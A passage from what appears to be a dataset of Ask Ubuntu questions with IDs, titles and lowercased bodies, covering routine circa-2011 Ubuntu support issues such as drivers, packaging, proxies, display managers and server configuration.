inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 07:05.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 07:05.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 07:05.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 07:05.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) * lsusb * bus 002 device 002 : id 0557:2220 aten international co. , ltd bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub * lshw * *-pci:1 description : pci bridge product : c51 pci express bridge vendor : nvidia corporation physical id : 3 bus info : pci @ 0000:00:03.0 version : a1 width : 32 bits clock : 33mhz capabilities : pci pm msi ht pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 memory : b6000000-b7ffffff *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan1 version : 01 serial : e0 : b9 : a5:9b : c3:65 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=2.6.38-8-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:19 memory : b6000000-b600ffff
59072	how to umount /home in ssh ?	i would like ssh , sudo su and umount /home and run diagnostic on it . is there a runlevel i can used to close x and other process using /home while keeping network access ? or another way ? thanks
59078	how do i optimize a nginx reverse proxy ?	i am pretty much a noobie at nginx and i really need some help . i am using nginx as a reverse proxy server to serve primarily as a load balancer . i am using almost only dynamic files . the back end servers are apache . here are my httperf results : single apache server ( 1024 mb ) : 300 requests per second 2x 512 mb apache server , 1 nginx server ( 1024 mb ) :300 requests per second 2x 1024 mb apache server , 1 nginx server ( 1024 mb ) :300 requests per second it seems that my nginx server is the bottleneck but i cant figure out how i can optimize it . the cpu usage and ram usage on the apache backend server and nginx server is minimal , less than 10 % . my goal is to find a great way to scale up and by using a load balancer , but it seems that if nginx is limited in requests per second as a single apache server , then there is no point ... . may i get some help from anyone please ?
59079	how do i configure a compaq v570 monitor ?	i have a compaq v570 monitor witch horizontal geometry is n't working well . in windows xp there is a program called `` powerstrip '' that allow me to modify the geometry and make it work fine . i would like to configure my ubuntu too . i 'm trying with xrandr and cvt but i do n't understand it very well . could you help me to configure my monitor please ? this is my powerstrip configuration on windows . https : //lh3.googleusercontent.com/-irs87bvln6u/tls_s7cyn4i/aaaaaaaaae0/kj2idaj8zyk/ps.jpg
59081	how can i configure a chinese input method ?	how can i configure a chinese input method for kde ? i do n't want a chinese locale , just to write chinese characters , mainly for learning purposes . ( i 'm still learning the language , so switching the entire ui to chinese is not an option ... ) google search results are inconclusive , and from what i understood , not specific to newer versions of kde . details : kubuntu 11.04 , kde 4.6
59083	is it possible to prevent the installation of a required package ?	if you install a program which depends on a number of other packages which are not installed , then apt-get automatically installs those dependencies . in allmost all cases this is the desired behaviour . but now and then i have a case where i do n't want to install a package which is marked as required but which is not really needed to use the program i actually want to install . example : i want to install the program logwatch the logwatch package depends on the installation of a mail transfer agent ( mta ) logwatch can be used without a mta i do n't want to install a mta i know i could install the program from source . but i want to know if apt-get provides a method to prevent the installation of a dependency ( without breaking the whole package management system ) .
59085	automatically refreshes chrome/firefox multiple times !	can someone let me know why sometimes ubuntu automatically refreshes browser and types some weird characters on shell prompt is opened . is it because of memory leak ! correct me if i 'm wrong . because of this multiple refresh www.askubuntu.com thrown this screen . i was able to resolve this sort of behavior only if i close all the windows and currectly active/opened shell prompts or other applications . uname -a linux 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:05:14 utc 2011 i686 i686 i386 gnu/linux
59086	printing pdf with lpr results in different output than printing gui	i run 11.04. i have a pdf file with an embedded logo ( png file ) and a few lines . the image has white background ( really it is white , i checked with gimp and the color picker ) . when i print the pdf file with the embedded printing gui from the `` document viewer '' the result is : image background is white lines are thicker than with lpr when i print with lpr myfile.pdf i get image background is not white ( its more like bisque ( # ffe4c4 ) ) lines are as thin as they should be as the p in pdf means `` portable '' i would like to know who things like this can happen ? i always use the same printer .
59092	how do i remove ia32-libs from the depends line as generated by shlibs : depends ?	i 've created a package which contains 32-bit libraries for compatibility with 32-bit applications on 64-bit systems , stored in /usr/lib32 . this causes the ia32-libs dependency being added to my package . however , the package works perfectly fine without those libraries as other 32-bit programs should install ia32-libs themselves . how do i prevent the build process from generating the ia32-libs dependency ? nvidia-current seems to able to do this too , but uses cdbs which i do not use . ( i use a plain rules file as generated by dh_make )
59094	create final deb file from multiple deb files	i have a packages deb file with all dependencies deb file . is it possible to create a final deb file ( one file ) using all . say example firefox.deb has 10 dependency .deb file . so there is a order to install all the dependency then at last firefox.deb . may i create a fullfirefox.deb file which automatically maintain everything ? i do not have source , just have deb files .
59095	copy to a sound device in /dev	years ago i was able to pipe the kernel to the sound device via cat /vmlinuz > /dev/dsp however , i do not have the sound device in natty 11.04 anymore . any idea , how i can do this in this new version of ubuntu ?
59097	how to setup puppet server ?	i would like to setup central management server ( puppet ) to manage all clients . i have read many documentations , but none of them was helpful . can anyone explain setting up puppet server in detail ? where we have to create the following files in server or in client ? now setup some resources for apache2 . create a file /etc/puppet/manifests/site.pp containing the following : package { 'apache2 ' : ensure = > installed } service { 'apache2 ' : ensure = > true , enable = > true , require = > package [ 'apache2 ' ] }
59103	why virtualbox 's menu has disappeared ?	how to show the menu bar of virtualbox ? because functions like cdrom , usb , ... etc needs menu bars to get working .
59107	find duplicate files and folders and move these to a different folder	is there a reliable duplicate file/folders utility , ( with gui ) for linux that can find duplicate files or folders and move them to different folder ?
59109	change desktop folder path	this is my first question here , i 'm trying to create a little script , that change icons shown in desktop . i mean , when i click on a button , i would launch this simple script cp $ home/.config/desktop5/user-dirs.dirs $ home/.config in desktop5/user.dirs i wrote : xdg_desktop_dir= '' $ home/downloads '' xdg_download_dir= '' $ home/downloads '' xdg_templates_dir= '' $ home/templates '' xdg_publicshare_dir= '' $ home/public '' xdg_documents_dir= '' $ home/documents '' xdg_music_dir= '' $ home/music '' xdg_pictures_dir= '' $ home/pictures '' xdg_videos_dir= '' $ home/videos '' i wrote 5 script for each most used folder : downloads , pictures , music , desktop and videos it works , but unfortunately , sometimes the desktop does n't refresh soon and i have to click several time the same button before than see desktop icons , change . how can i resolve this problem ? edit : i thanks for the answer , i substituded `cp $ home/.config/desktop5/user-dirs.dirs $ home/.config` with this two command : rm -r ~/desktop ln -s ~/downloads ~/desktop i could n't use rm -r-i ~/desktop because this command was launched by a script now it works !
59116	ati driver from amd website keeps crashing ?	i just solved a problem by installing the latest ati drivers from amd 's website . problem is i think it crashes my system , like few times a day already ... how can i confirm its the cause and how can i fix it ? update i am using ati radeon 5670 ubuntu 11.04 desktop 2.6.38-11-generic i reverted back to the driver from jockey/additional drivers . so no crashes , i will probably use the ati/amd sites 1 again to see if it crashes , then post the log . update i just rebooted from a crash , this time , i am using open source drivers . last `` few '' lines of xorg.0.log on pastie same for syslog maybe its not a graphics or driver thing ? can it be something else ? how can i troubleshoot ? update 2 it might also be unity ? i installed a `` bare '' ubuntu 11.04 system via alternate cd then install the packages . while using ubuntu classic , all seemed well . then i switched to unity , it appeared not to work with the defuault dirivers then things start going wrong ... also see below ... whats with the super dark shadows and artifacts with the launcher ?
59117	why is n't my flash drive recognized ?	after i clean install ubuntu 11.04 on my laptop the flash drive/usb does n't work with it anymore , my usb just blinks but nothing appears on the desktop .
59126	reload bash 's .profile without logging out and back in again	is it possible to coerce bash to reload the .profile file without logging out and back in again ?
59128	how to disable mouse wheel scroll in ubuntu 11.04 or 10.10 ?	ive got problem with broken scroll wheel . ( i know i shoud change mouse , its old ) . and i want to just disable wheel scroll but not middle button click . i know that it is possible to do , but cant find that config file . ( have no entry at xorg.conf )
59131	how can i logout of and then log back into ubuntu software center ?	i bought an app and then later could n't remember my password and the reset option did n't work so i ended up creating a second account . ( guess that was dumb of me . ) anyway , is there a way i can log out and then back in with my original account ?
59132	samba does n't work on 10.10	i have dual-boot laptop asus k42j ( with natty 11.04. and maverick 10.10 ) . natty 11.04 was freshly installed , and then after couple months i had installed maverick alongside ( just for experiment ) . i can access all my network shares under natty without any issues ( nas , win 7 laptop and 2 mediaplayers ) , but samba doesn’t work under maverick however - can’t see any shares . i had used for samba in maverick the same setup like i have under natty . is there any difference between samba’s settings in 10.10 and 11.04 ? would be great if somebody could help me to make maverick’s samba work .
59134	lowering graphics card power consumpution	my laptop have ati mobility hd4500 graphics card . i am using the ati drivers . still my palm rest is getting quite hotter compared to when i am using the windows . this is my graphics card is present under the palm rest . i have also change the `` power play '' in the catalyst control center to maximum battery still no effect in ubuntu . this works perfectly well in windows . can anyone pls suggest me how can i reduce my graphics card 's power consumption or make it to run at lower temperature .
59135	how can i know/list available options for kernel modules ?	as the question says it all , i would just like to elaborate with an example : i915.i915_enable_rc6=1 this is an option for i915 module or intel video driver . so is there any way to know or list something like i915_enable_rc6 is an option for i915 from linux commandline ? i hope i am clear with the question ? edit : i was referring to i915 just for example and nothing else . modinfo seems to be the command i was looking for .
59136	how can i write a small script to clean every directory 's files when the computer starts ?	i have a guest computer for only internet usage . some users download some files and leave them on the desktop but the computer does not have enough space for all guests and it is not allowed to put a file in there . what i want to do is clean every file inside the home directory when the computer starts , but keep the directory structure like music , pictures , documents & downloads . how can i accomplish this ?
59137	installing google earth from the software store	i 'm new to linux . how come i can just install google earth with one click through software center on linux mint , but i have to jump through hoops with ubuntu ?
59146	how to change the dns name server ?	how to change the dns nameserver in ubuntu 11.04 , when i typed node.ws on browser url-bar it redirected me to sedoparking.com site ; how can i change to google dns ie , 8.8.8.8 here is the attachement :
59150	touchpad disabled after login on a lenovo g550 laptop	i installed touchpad-indicator to manage my touchpad settings while using an external usb mouse . now , after some-time , my touchpad has stopped working after login to the ubuntu system . it works fine till the login screen , then stops . i have tried removing and re-installing the touchpad-indicator application , but it does n't help . can anyone please tell me the steps i need in order to evoke my touchpad again . i am using ubuntu 11.10 with kernel version 3.0.0.9 on a lenovo g550 laptop .
59152	is there any social dashboard that 's like geckoboard ?	i 've got a netbook running ubuntu 11.04 , a secondary machine that i 'm looking to set up as a personal dashboard , sort of like geckoboard is for business analytics . i just want to see notifications from email , facebook , twitter , etc . in a clean , simple , consistent , and aesthetically pleasing view . i 've looked into screenlets , but they mostly look awful , and they 're not all consistent with each other . at least , the default screenlets that i 've seen are n't . i 'm eventually planning on hooking this up to a wall-mounted monitor . primary purpose is to be able to keep an eye on things while i 'm gaming or watching movies full-screen on my primary machine . ( or , y'know , doing work and not wanting to tab-switch constantly to check on everything . ) something like the `` panic status board '' would be beautiful .
59154	what 's the best way to effectively report bugs ?	i 've been trying to report a bug about activities in kubuntu causing me no end of grief with multiple issues ranging from annoying to total freeze/crash requiring hardware reset . i 'm trying to follow official instructions to make sure i file my problems correctly starting at : https : //help.ubuntu.com/community/reportingbugs https : //wiki.kubuntu.org/kubuntu/bugs/reportingbugs https : //launchpad.net/ubuntu https : //help.ubuntu.com/community/reportingbugs the above is circular reference with no obvious alternative path for kubuntu users . alternatively using ubuntu instead of kubuntu links from reportingbugs clicking for 3 . make sure the bug has n't already been reported ( 11.04 natty ) at the following link in the kubuntu section there are only 6 listed bugs : https : //wiki.ubuntu.com/nattynarwhal/releasenotes none of which apply to me and no further guidance other than a link to the following at the bottom of the page which takes me back to our old friend : https : //help.ubuntu.com/community/reportingbugs now trying instructions at 4 . filing a general bug against no particular package to run ubuntu-bug using that tool tells me to uninstall nvidia drivers that i needed to fix previous crash problem with resizing konsole causing a freeze . after refusing to uninstall my drivers it then it suggests i try going here to http : //askubuntu.com other than asking this question i see no other solution , so i guess my question is : what the heck am i supposed to do a proper bug report or get a solution to my never ending issues with kubuntu and kde 4 's plasma and especially activities ?
59159	disable `` middle click to lower window '' behaviour on gnome	i am using the chromium web browser , and standard gnome ( i.e . not unity ) . chromium ( like lots of things ) has many tabs , and allows you to middle click on a tab to close the tab . but if i middle click on the blue part outside the tab , then it lowers the window underneath all the other windows . however i often find myself attempting to middle click on a tab to close it , and accidentally middle clicking outside the tab ( which is the title bar in chromium ) , and hence accidentally lowering the window . how do i disable this `` middle click to lower window '' behaviour ?
59160	theming or changing colors for nautilus ?	i 've got a dark theme for emacs and i use white-on-black for my terminal ; to match the color scheme i have going , i 'd like to make nautilus also white-on-black . is it possible to theme nautilus or otherwise change the color scheme ? thanks !
59163	cursor stops in the middle after pressing home key	in terminal i 've changed my ps1 . i think it maybe causing issues with allowing me to hit the home button . normally by hitting the home button it 's suppose to return to the first character on the first line my prompt file : https : //raw.github.com/chrisjlee/dotfiles/master/.prompt # setup color variables # # # # # # # # # # # # # # # # # # # # # # # # # # # # # startfgcolor='\e [ 0 ; 36m' startbgcolor= '' \e [ 0 ; 32m '' endcolor= '' \e [ 0m '' export ps1= '' \e [ 0 ; 36m\n [ $ startfgcolor $ startbgcolor\u @ \h\e [ 01 ; 35m \w $ startbgcolor $ startfgcolor ] \e [ 0 ; 32m\n\e [ 0 ; 35m ] $ $ endcolor '' whenever i redo the last command ( by hitting the up button in terminal ) and hit the home button it 'll stop halfway . and then the characters will not read correctly has anyone else have this issue ?
59167	can not enable desktop effects on a thinkpad x220	my environment is as follows : laptop : thinkpad x220 , intel hd graphics family ( i915 ) . dual-os : windows 7 professional , ubuntu 10.10 . my problem is i can not enable the desktop effects . i have installed the xserver-xorg-video-intel using this commands : sudo add-apt-repository ppa : glasen/intel-driver sudo apt-get update sudo apt-get install xserver-xorg-video-intel and reboot . however , when i attempted to enable the desktop effects , it displayed `` searching available drivers '' , `` desktop effects can not enabled '' . when i opened the `` additonal drivers '' , there was no corresponding video driver available . who can tell me whether there is a trick when install or load the intel i915 driver on ubuntu 10.10 or not ? thanks a lot .
59173	how do i convert lvm partitions to ntfs/ext ?	i have an lvm partition that is split into /projects ( 500 gb ) and /backup ( 1.5 tb ) . i can not mount it because it was on a root machine that crashed . how can i restore the data without do lvm to ubuntu harddrive ?
59175	installation from usb flash drive froze after boot	i am trying to install ubuntu 11.04 on a computer that has windows on it . i created an usb stick with ubuntu 's utility included on the live cd and the restarted and booted from usb . after i get the line below printed on the screen and nothing happens : syslinux 3.82 2009-06-09 ebios copyright ( c ) 1994-2009 h. peter anvin et al i tried to google it and see if somebody else had this problem but have not found an answer as to why i can not boot .
59176	advisable to install with `` uefi-only '' or `` legacy '' bios setting on lenovo thinkpad ?	i got a new lenovo thinkpad . i 'm preparing to install ubuntu on the computer . the bios settings give me the choice of setting it to `` uefi-only '' or `` legacy . '' i 'd prefer to use uefi-only because it 's supposed to allow faster boot . but i do n't know how well ubuntu supports uefi . which setting is advisable ?
59179	how do i make noatime mounts default ?	i 'm making an ubuntu derivative , and i want to make noatime the default mount option for all filesystems ( instead of relatime which is default in ubuntu ) . there seems to be a boolean default_relatime kernel parameter for switching between defaulting to atime or relatime ( also available by writing to /proc/sys/kernel/default_relatime ) , but i ca n't find an equivalent for noatime and i do n't know how to enable that in a distro by default . how to configure to record data to pendrive instantly ? suggests that there 's a way to add noatime mount parameter via udev , but i have no idea if that will work for internal media and how to do it . what 's the least invasive way to make the kernel default to noatime ? current default can be viewed using `` cat /proc/mounts '' because it shows even implicit mount parameters ; do n't trust `` mount '' . yes , i 've read is it worth to tune ext4 with noatime ? and i still want to do it .
59181	how to install google earth ?	i 've downloaded the googleearth_6.0.3.2197+0.6.0-1_i386.deb package . when i try installing it , it gives the following warning : the package is of bad quality the installation of a package which violates the quality standards is n't allowed . this could cause serious problems on your computer . please contact the person or organisation who provided this package file and include the details beneath . details : lintian check results for /home/dei/googleearth_6.0.3.2197+0.6.0-1_i386.deb : e : googleearth : maintainer-name-missing < root @ dei-hp-elitebook-6930p > e : googleearth : maintainer-address-malformed < root @ dei-hp-elitebook-6930p > so what should i do ? can i ignore the warning and proceed with the installation ?
59188	the update info is outdated , white triangle with exclamation sign in system tray	i 've got the triangle with exclamation sign inside in system tray , description is the following : the update information is outdated . this may be caused by network problems or by a repository that is no longer available . please update manually by clicking on this icon and then selecting 'check for updates ' and check if some of the listed repositories fail . 'check ' updates does n't help - it shows no updates everytime . it would be greatful if somebody could help me to solve it
59192	can not control the fan on a sony vaio laptop	i 've got sony vaio laptop and my fan is on all the time , though the temperature on the video-adapter is always over 60°с . as i 've googled , vaiofand does not support vpc-ea series . is there anything i can do with that or i need another laptop ? i 'm using the following graphics card : 01:00.0 vga compatible controller : ati technologies inc manhattan [ mobility radeon hd 5000 series ] though the problem is not with the graphics card . i 've mentioned its temperature as the highest ( 64°c now btw ) . seems like the notebook is always overheated and i can not control the fan speed to make it cooler . and yes , i 'm using the proprietary driver ati/amd fglrx graphics driver . i 'm using kubuntu 11.04 .
59199	can i set a default user in lightdm ?	i 've been playing with ubuntu oneiric on my netbook ( where breakage is n't really a concern ) ; i like the new lightdm login screen , but it has one minor annoyance : in addition to my own user account , there 's another account for occasional use by my girlfriend , and her user account is the one that 's always focused ( presumably because it 's first alphabetically ) . i know how to fix this in gdm but have n't found a solution for lightdm . does anyone know how to set it up so my account is highlighted by default ?
59200	why is there 8gb worth of files in my /tmp ?	i just got a notification saying i have a small amount of disk space left : so i opened baobab to investigate and noticed this : it turns out that my /tmp folder is full of files names like tmpxxxxxx . these look to me like temporary files created by a python script . how can i find out what program is causing this ? the timestamps vary between approximately when i first logged in to now . they are binary files and file managers see them as type 'unknown ' . lsof /tmp/tmp* gives nothing . when i run ls -l /tmp/tmp* , the last 10 entries are : -rw -- -- -- - 1 david david 21195909 2011-08-29 21:53 /tmp/tmpztxynt -rw -- -- -- - 1 david david 2381 2011-08-29 15:53 /tmp/tmpzukqaw -rw -- -- -- - 1 david david 6987663 2011-08-29 18:38 /tmp/tmpzusep5 -rw -- -- -- - 1 david david 1789626 2011-08-29 20:33 /tmp/tmpzv3mst -rw -- -- -- - 1 david david 19266899 2011-08-29 22:15 /tmp/tmpzxmcu5 -rw -- -- -- - 1 david david 21197879 2011-08-29 20:52 /tmp/tmpzxsxv2 -rw -- -- -- - 1 david david 65960 2011-08-29 18:13 /tmp/tmpzya6aj -rw -- -- -- - 1 david david 352529 2011-08-29 22:47 /tmp/tmpzz3jpd -rw -- -- -- - 1 david david 13869 2011-08-29 22:25 /tmp/tmp_zz3za -rw -- -- -- - 1 david david 17277993 2011-08-29 20:53 /tmp/tmpzzsmnl
59201	flash player + youtube hd = crashing plugin	i 've installed ubuntu with wubi , on my winxp system . i can not seem to get youtube videos to play in hd ( using firefox 6 ) without crashing . i tried gnash first , but that did not seem to be quite functional . i could not jump ahead in the video , control sound , etc . so i decided to try out adobe 's flash . it works fine , except for hd video , where it plays for a little while , then freezes the video ( and firefox ) while the audio keeps running , then after a while , the flash player crashes and i get the sad face `` flash player has crashed // send error report '' . when running windows i have no problem playing youtube videos . at least not most of the time.. i have searched around for an answer , but not found anything that works . i have for example disabled hardware acceleration , and tried using https : //www.youtube.com . using html5 on youtube seems to work , but that does not seem to be available for all videos . i do n't know what specs are important , so please ask if you need something else . if anyone has ideas , alternative flash players , workarounds , or places to look for possible answers/support , i 'd be very grateful . update : specs as requested in comment . running windows xp/ubuntu 11.04 on a laptop ( 3-4 years old ) : intel core2duo t9300 2.5ghz 800/6m box 2 x kingston 2gb 667mhz ddr2 non-ecc cl5 sodimm chipset intel gm965 processor intel速 core 2 graphics card nvidia geforce go 8600m gt graphics card memory ( max ) 512 mb update : apparently it was a firefox problem , because using chromium seems to work with flash player & youtube hd . robinj 's comments helped me fix this one .
59202	`` print '' background colors in pdf using chrome	i try to save a page as a pdf file but it loses the background colors . i figure this is a standard setting for a printer , but when i save as a pdf i prefer the background colors to stay . how can this be done ?
59203	how can i protect my data when lending my computer to someone ?	i 'm going to lend an old pc with dual boot ( ubuntu and win xp ) to a friend for few days . ubuntu contains a lot of data that i want to keep confidential . i have protected my session with a strong password . is that enough to keep my data confidential ? i have heard that booting from a live cd can give access to the installed data ; is that true ?
59205	`` no such file to load -- zlib '' error when installing a gem	when i decided to install gem in ubuntu yesterday ( with this command : sudo gem install algorithms ) , bash gave me an error . how can i install gem in ubuntu like that installing on windows ? ***** this is a screenshot from my terminal ********* thanks
59214	installing/executing .bin file	i have a .bin file called file.bin and i am new to ubuntu and i am trying to figure out how to install it . what is the proper command to run via terminal ? i have tried : ./file.bin - reports error `` directory does not exist '' and sudo ./file.bin - nothing happens at all with this command . how do i execute this binary ?
59218	how can i disable built-in gestures in unity 2d	i have a tablet with gma 500 graphics which totally blows ... but the psb-gfx driver does a decent job with 2d acceleration ( no 3d though ) so i 'm stuck using unity 2d . anyway , i ca n't disable unity-2d 's gestures so i ca n't configure the gestures i want with ginn ( they conflict with the built in ones ) .
59222	why does xorg take all available cpu power when i run update manager ?	i am using xubuntu 11.04 with the default nouveau driver for nvidia corporation nv17 [ geforce4 mx 420 ] graphics controller . xorg takes all available cpu power , if i run update manager in this system ; it happens when update manager shows progress bar before you can check or install updates . same thing happens , if i run pavucontrol that shows a volume meter moving along with to sound playback volume . i can see high xorg load in another computer that has intel graphics , but it does not take that long time . is this a bug in nouveau driver ?
59224	haproxy configuration	i cant get my haproxy to come online ... .when i do service haproxy start i get fatal errors my setup i installed haproxy then install heartbeat ... i only want to have one nlb and two web servers ( windows ) . do i need heartbeat still ? ? i added eth0:0 with vip - 10.4.3.56 when i try to start the haproxy with cfg - global log 127.0.0.1 local0 log 127.0.0.1 local1 notice # log loghost local0 info maxconn 4096 # debug # quiet user haproxy group haproxy defaults log global mode http option httplog option dontlognull retries 3 redispatch maxconn 2000 contimeout 5000 clitimeout 50000 srvtimeout 50000 listen webfarm 10.4.3.56:80 mode http stats enable stats auth someuser : somepassword balance roundrobin cookie jsessionid prefix option httpclose option forwardfor option httpchk head /check.txt http/1.0 server weba 10.4.3.52:80 cookie a check server webb 10.4.3.53:80 cookie b check i cant get it to start please advise ...
59228	how to set up a mail server ?	i wanted to send and receive emails as my-custom-name @ my-mail-server-com ; how can i setup it up under ubuntu . i have dyndns setup on my machine .
59229	is there any way to connect to windows powershell from the terminal ?	i want to access a windows machine from ubuntu . i do n't want to connect with to the gui ( rdesktop ) - instead i want to connect to windows powershell from the terminal . this is because i want to administer the windows machine similarly to how you can administer a headless linux server : running background jobs , writing shell scripts to perform daily/weekly remote maintenance , shutting down/logging off thru shell scripts . will rlogin work , and if so how ? if not , what other options are there ?
59231	share files between ubuntu 11.04 and 10.04 over lan	i have one desktop wired to router running ubuntu 10.04 and a laptop running 11.04 connected wireless to the same router , both accessing internet . how do i share files between these machines ? i have enabled share for folders in the desktop ( 10.04 ) , but error 255 in laptop ( 11.04 ) samba installed in both machines
59234	how do i open an .eml file in evolution ?	open eml extension mail file in evolution.if anybody sent mail from outook to evolution not able to open the file please help
59235	internet dropping out on toshiba qosmio x505	i 'm helping a friend with installing ubuntu on his toshiba qosmio x505 64-bit laptop ( natively runs windows 7 64-bit ) . he has comcast cable internet , the same service and routed as we do . we use ubuntu with it with absolutely no problems , ever . i have been trying to install software , but to no avail as every minute or so , the internet drops out and comes back up , causing an error in any installation . this is the case on both wireless and wired ( ethernet ) connections . what are the steps i need to take to solve this problem ? ( please o n't close on account of `` duplicate '' - i am looking for a hardware specific answer , here . other solutions are n't working . )
59241	synchronisation not working . how do i fix that ?	as you no doubt know , ubuntu one and tomboy look really great . but performance on sync has been chewing painfully at me for months . when i try to sync my notes it tells me it ca n't and there 's nothing in the details pane . i 've searched through forums and found no solution that works .
59242	how do you completely reset monitor configuration ( e.g . what used to be dpkg-reconfigure xserver-xorg ) ?	using unity 11.04 . i have a secondary monitor ( actually two , one at home , one at work ) . the home twin monitor set up works perfect ( viewsonic monitor ) . at work , i get very buggy behaviour , such as full screen applications 'ghosting ' when maximized , and other strange effects . i would like to try and completely reset the monitor configurations ( not unity or compiz ) , before doing anything else . in 10.10 this would be accomplished : dpkg-reconfigure xserver-xorg
59245	event registration on loco.ubuntu.com	on planet ubuntu there was a post asking rsvp to an ubuntu jam organized by the californian loco . the event linked to loco.ubuntu.com event entry , where we could enter our rsvp status . is it possible to implement a similar system for our loco page on ubuntu wiki ? edit as @ jorgecastro pointed out in the comments , locos can register events at loco.ubuntu.com . but what is the procedure to register an event there ?
59246	can i make mailto : links open up in gmail instead of evolution ?	mailto : links fire up annoying `` evolution setup assistant '' . i want it to open a compose window in gmail in my web browser . there are existing questions about this here , but the answers are outdated and no longer work on 11.04. on my system : i 'm using chromium browser , and i think the path goes like this chrome - > xdg-open - > gnome-open and it 's evolution that is set up when i check in gconf-editor , so i changed that key to gnome-open https : //mail.google.com/mail/ ? extsrc=mailto & url= % u , but it 's still firing up evolution .
59248	how can i make dropbox wait for truecrypt ? ( including password input )	i am using truecrypt to secure my data and am obliged to use dropbox for some file sharing . i 've set up my dropbox folder on the truecrypt mount . when i log in dropbox throws an error , because the dropbox folder does n't exist yet . i then have to mount the folder and restart dropbox . is there any way that i can script the following : start truecrypt , prompting to mount favorite volumes can not set a time for this as it 's based on user input ( i have to enter my admin password and truecrypt password , and i must admit that sometimes i get distracted and make coffee while doing this ) only when volume is mounted , start dropbox options to do this automatically ( on login ) and manually
59250	assign multiple keyboard shortcuts for one action	i 've been wondering how can i assign to multiple keyboard shortcuts to do the same action ? more specifically , i want to be able to change my volume with both my headset buttons and my keyboard . i 'm able to change the volume with just one at the time : with the one i define in the 'keyboard shortcuts ' application . is there any way ?
59258	ubuntu wont detect my second monitor anymore	is there a way to restart it to its default settings ? i 've tried everything else sudo dpkg-reconfigure xserver-xorg does not work
59259	whereare the shortcut settings for audio/video actions stored ?	i 'm trying to find the file where gnome stores the configuration for keybindings , such as volume up , volume down , in order to get their actions . i know i can find some shortcuts in $ home/.gconf/apps/metacity/global_keybindings/ % gconf.xml and $ home/.gconf/apps/metacity/window_keybindings/ % gconf.xml , but where are the multimedia keybindings ?
59261	dpkg can not remove package > linux-restricted-modules	i 'm having a couple of issues with my ubuntu server currently . when using apt for anything it tells me : the following packages will be removed linux-restricted-modules-2.6.28-11-server linux-restricted-modules-2.6.28-19-server but the uninstall fails because the directories and images already do not exist . dkpg -- list | grep linux-restricted-modules ... returns this information : rh linux-restricted-modules-2.6.28-11-server 2.6.28-11.15 rh linux-restricted-modules-2.6.28-19-server 2.6.28-19.24 so the r means i want it removed and i think the h means it only half exists on the system or something ? how to i remove whatever is left of this package so i can stop receiving these error messages ? thanks . edit : complete output of apt-get upgrade : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed linux-restricted-modules-2.6.28-11-server linux-restricted-modules-2.6.28-19-server 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 5,046kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 59849 files and directories currently installed . ) removing linux-restricted-modules-2.6.28-11-server ... rmdir : failed to remove `/lib/modules/2.6.28-11-server/volatile/ ' : no such file or directory fatal : could not open '/boot/system.map-2.6.28-11-server ' : no such file or directory update-initramfs : generating /boot/initrd.img-2.6.28-11-server can not find /lib/modules/2.6.28-11-server update-initramfs : failed for /boot/initrd.img-2.6.28-11-server dpkg : error processing linux-restricted-modules-2.6.28-11-server ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-restricted-modules-2.6.28-19-server ... rmdir : failed to remove `/lib/modules/2.6.28-19-server/volatile/ ' : no such file or directory fatal : could not open '/boot/system.map-2.6.28-19-server ' : no such file or directory update-initramfs : generating /boot/initrd.img-2.6.28-19-server can not find /lib/modules/2.6.28-19-server update-initramfs : failed for /boot/initrd.img-2.6.28-19-server dpkg : error processing linux-restricted-modules-2.6.28-19-server ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-restricted-modules-2.6.28-11-server linux-restricted-modules-2.6.28-19-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
59265	how to troubleshoot apt-get connection problems ?	i am working at a client where there is no proxy server for connecting to the internet . i can download urls with wget from the command line , but trying to install something with apt-get times out after a long time ( that is to say , i think it eventually times out , at least it does nothing for a very long time ) . how can i troubleshoot connection problems with apt-get ? i do n't see anything like a verbose switch in the man pages . what does apt-get use for establishing connections ? ( i assume not wget , because like i said , that works ) .
59270	how to modify the firefox homepage in livecd for every new user ?	i have made a custom ubuntu livecd with uck . how do i modify firefox 's homepage ?
59272	php not working in apache2 after system upgrade	recently upgraded my system from karmic to lucid . this involved apache and php being updated i believe . now my server is unable to handle php files , any navigation to them is triggering downloading rather than parsing . the php module is still loaded in apache mods-enabled and i have addtype application/x-httpd-php .php in my httpd.conf . there are no meaningful messages in apache access or error logs so i am stumped . any help would be appreciated . thanks .
59275	i ca n't login to one account from my android phone password	when i get the ubuntu single sign on screen on my android phone , i type email address and password but get `` x password did n't match '' . i am 99 % sure my details are correct and case sensitive . i am a little confused , what should i try ? my mistake missed the 'i ' out of gmail . sorry .
59276	how to install ubuntu game pack with a virtual drive ?	i downloaded the ualinux gamepack dvd 1 .iso and mounted with acetoneiso . now i got the virtual drive in desktop . but when i try to install with the autoinstaller in the virtual dvd root , a window with this error it 's showed ( i 'm translating from spanish ) and the installation stops : e : ca n't change to a /home/julio/virtual-drives/1/ - chdir ( 13 : permission denied ) how could i fix this ? thank you very much !
59279	how configure java applet to work behind proxy ?	i 'm running ubuntu 11.04 and have installed sun-java6-* packages . my workstation is running behind an authenticated proxy , i 've set the gnome proxy settings system wide and almost everything works fine , except for the java applets that ask me for the proxy password but does n't work when i type in . any ideas about how to make it work ?
